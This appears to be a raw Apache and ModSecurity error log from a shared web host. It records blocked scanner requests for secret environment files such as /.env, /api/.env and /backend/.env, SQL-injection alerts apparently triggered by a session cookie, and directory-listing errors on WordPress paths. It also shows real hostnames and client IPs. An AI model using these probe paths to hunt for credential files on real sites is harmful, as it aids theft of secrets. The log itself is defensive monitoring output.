[Tue May 12 03:39:49.609023 2026] [autoindex:error] [pid 1709071:tid 1709096] [client 85.203.21.79:20313] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/preformatted/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/blocks/preformatted/
[Tue May 12 03:39:51.122446 2026] [security2:error] [pid 1730207:tid 1730209] [client 172.104.186.23:55242] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp"] [unique_id "agKE5zue9Sp-pIv_Bb6fEwAAAUA"]
[Tue May 12 03:39:51.122654 2026] [security2:error] [pid 1730207:tid 1730209] [client 172.104.186.23:55242] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp"] [unique_id "agKE5zue9Sp-pIv_Bb6fEwAAAUA"]
[Tue May 12 03:39:51.122871 2026] [security2:error] [pid 1730207:tid 1730209] [client 172.104.186.23:55242] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKE5zue9Sp-pIv_Bb6fEwAAAUA"]
[Tue May 12 03:39:55.293026 2026] [autoindex:error] [pid 1695975:tid 1695994] [client 85.203.21.112:54679] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/js/tinymce/themes/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:39:56.177035 2026] [autoindex:error] [pid 1709071:tid 1709096] [client 85.203.21.79:20313] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/js/tinymce/themes/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/js/tinymce/themes/
[Tue May 12 03:40:03.072095 2026] [security2:error] [pid 1691274:tid 1691283] [client 172.104.186.23:59730] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKE81fdQaraX_prmqcuTAAAAAY"]
[Tue May 12 03:40:03.072284 2026] [security2:error] [pid 1691274:tid 1691283] [client 172.104.186.23:59730] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKE81fdQaraX_prmqcuTAAAAAY"]
[Tue May 12 03:40:04.257499 2026] [security2:error] [pid 1691274:tid 1691283] [client 172.104.186.23:59730] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKE81fdQaraX_prmqcuTAAAAAY"]
[Tue May 12 03:40:07.007670 2026] [authz_core:error] [pid 1730207:tid 1730222] [client 47.128.125.89:33886] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/sodium_compat/src/error_log
[Tue May 12 03:40:10.995632 2026] [autoindex:error] [pid 1695975:tid 1695994] [client 85.203.21.112:54679] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/tag-cloud/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:40:11.906809 2026] [autoindex:error] [pid 1709071:tid 1709096] [client 85.203.21.79:20313] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/tag-cloud/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/blocks/tag-cloud/
[Tue May 12 03:40:13.844688 2026] [security2:error] [pid 1730207:tid 1730230] [client 43.134.111.60:33358] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.of-crystal-lake.net"] [uri "/fiche-chien.php"] [unique_id "agKE_Tue9Sp-pIv_Bb6fKQAAAVU"]
[Tue May 12 03:40:17.964254 2026] [security2:error] [pid 1730175:tid 1730190] [client 43.155.140.157:38146] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecf.fr"] [uri "/"] [unique_id "agKFAXo6NvB9WXx5V-6KIQAAAQ0"]
[Tue May 12 03:40:25.388541 2026] [security2:error] [pid 1730207:tid 1730225] [client 208.84.100.96:4540] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.apoe.fr"] [uri "/.env"] [unique_id "agKFCTue9Sp-pIv_Bb6fRwAAAVA"]
[Tue May 12 03:40:25.388723 2026] [security2:error] [pid 1730207:tid 1730225] [client 208.84.100.96:4540] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.apoe.fr"] [uri "/.env"] [unique_id "agKFCTue9Sp-pIv_Bb6fRwAAAVA"]
[Tue May 12 03:40:25.388975 2026] [security2:error] [pid 1730207:tid 1730225] [client 208.84.100.96:4540] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.apoe.fr"] [uri "/.env"] [unique_id "agKFCTue9Sp-pIv_Bb6fRwAAAVA"]
[Tue May 12 03:40:25.402955 2026] [security2:error] [pid 1695975:tid 1695997] [client 208.84.100.96:4542] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.apoe.fr"] [uri "/.env.local"] [unique_id "agKFCdVI9ymHBxup74-afwAAAJM"]
[Tue May 12 03:40:25.403111 2026] [security2:error] [pid 1695975:tid 1695997] [client 208.84.100.96:4542] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.apoe.fr"] [uri "/.env.local"] [unique_id "agKFCdVI9ymHBxup74-afwAAAJM"]
[Tue May 12 03:40:25.403476 2026] [security2:error] [pid 1695975:tid 1695997] [client 208.84.100.96:4542] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.apoe.fr"] [uri "/.env.local"] [unique_id "agKFCdVI9ymHBxup74-afwAAAJM"]
[Tue May 12 03:40:25.404083 2026] [security2:error] [pid 1695975:tid 1695999] [client 208.84.100.96:4582] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.apoe.fr"] [uri "/app/.env"] [unique_id "agKFCdVI9ymHBxup74-agAAAAJU"]
[Tue May 12 03:40:25.404346 2026] [security2:error] [pid 1695975:tid 1695999] [client 208.84.100.96:4582] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.apoe.fr"] [uri "/app/.env"] [unique_id "agKFCdVI9ymHBxup74-agAAAAJU"]
[Tue May 12 03:40:25.404668 2026] [security2:error] [pid 1695975:tid 1695999] [client 208.84.100.96:4582] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.apoe.fr"] [uri "/app/.env"] [unique_id "agKFCdVI9ymHBxup74-agAAAAJU"]
[Tue May 12 03:40:25.407158 2026] [security2:error] [pid 1709071:tid 1709091] [client 208.84.100.96:4562] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.apoe.fr"] [uri "/.env.production"] [unique_id "agKFCbvMumyrWMfSu7q5EgAAAMQ"]
[Tue May 12 03:40:25.407322 2026] [security2:error] [pid 1709071:tid 1709091] [client 208.84.100.96:4562] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.apoe.fr"] [uri "/.env.production"] [unique_id "agKFCbvMumyrWMfSu7q5EgAAAMQ"]
[Tue May 12 03:40:25.407542 2026] [security2:error] [pid 1709071:tid 1709091] [client 208.84.100.96:4562] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.apoe.fr"] [uri "/.env.production"] [unique_id "agKFCbvMumyrWMfSu7q5EgAAAMQ"]
[Tue May 12 03:40:25.417922 2026] [security2:error] [pid 1691274:tid 1691278] [client 208.84.100.96:4584] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.apoe.fr"] [uri "/api/.env"] [unique_id "agKFCVfdQaraX_prmqcuYgAAAAE"]
[Tue May 12 03:40:25.418083 2026] [security2:error] [pid 1691274:tid 1691278] [client 208.84.100.96:4584] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.apoe.fr"] [uri "/api/.env"] [unique_id "agKFCVfdQaraX_prmqcuYgAAAAE"]
[Tue May 12 03:40:25.418286 2026] [security2:error] [pid 1691274:tid 1691278] [client 208.84.100.96:4584] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.apoe.fr"] [uri "/api/.env"] [unique_id "agKFCVfdQaraX_prmqcuYgAAAAE"]
[Tue May 12 03:40:25.421490 2026] [security2:error] [pid 1730207:tid 1730214] [client 208.84.100.96:4600] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.apoe.fr"] [uri "/backend/.env"] [unique_id "agKFCTue9Sp-pIv_Bb6fSAAAAUU"]
[Tue May 12 03:40:25.421651 2026] [security2:error] [pid 1730207:tid 1730214] [client 208.84.100.96:4600] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.apoe.fr"] [uri "/backend/.env"] [unique_id "agKFCTue9Sp-pIv_Bb6fSAAAAUU"]
[Tue May 12 03:40:25.421866 2026] [security2:error] [pid 1730207:tid 1730214] [client 208.84.100.96:4600] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.apoe.fr"] [uri "/backend/.env"] [unique_id "agKFCTue9Sp-pIv_Bb6fSAAAAUU"]
[Tue May 12 03:40:41.358196 2026] [security2:error] [pid 1730207:tid 1730223] [client 172.104.186.23:51144] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/blog"] [unique_id "agKFGTue9Sp-pIv_Bb6fXgAAAU4"]
[Tue May 12 03:40:41.358419 2026] [security2:error] [pid 1730207:tid 1730223] [client 172.104.186.23:51144] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/blog"] [unique_id "agKFGTue9Sp-pIv_Bb6fXgAAAU4"]
[Tue May 12 03:40:41.358627 2026] [security2:error] [pid 1730207:tid 1730223] [client 172.104.186.23:51144] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKFGTue9Sp-pIv_Bb6fXgAAAU4"]
[Tue May 12 03:40:47.521521 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:42564] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKFH7vMumyrWMfSu7q5JgAAANM"]
[Tue May 12 03:40:47.521714 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:42564] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKFH7vMumyrWMfSu7q5JgAAANM"]
[Tue May 12 03:40:48.112204 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:42564] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKFH7vMumyrWMfSu7q5JgAAANM"]
[Tue May 12 03:40:51.655050 2026] [security2:error] [pid 1691274:tid 1691291] [client 172.104.186.23:35790] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/test"] [unique_id "agKFI1fdQaraX_prmqcugAAAAA8"]
[Tue May 12 03:40:51.655245 2026] [security2:error] [pid 1691274:tid 1691291] [client 172.104.186.23:35790] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/test"] [unique_id "agKFI1fdQaraX_prmqcugAAAAA8"]
[Tue May 12 03:40:51.655469 2026] [security2:error] [pid 1691274:tid 1691291] [client 172.104.186.23:35790] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKFI1fdQaraX_prmqcugAAAAA8"]
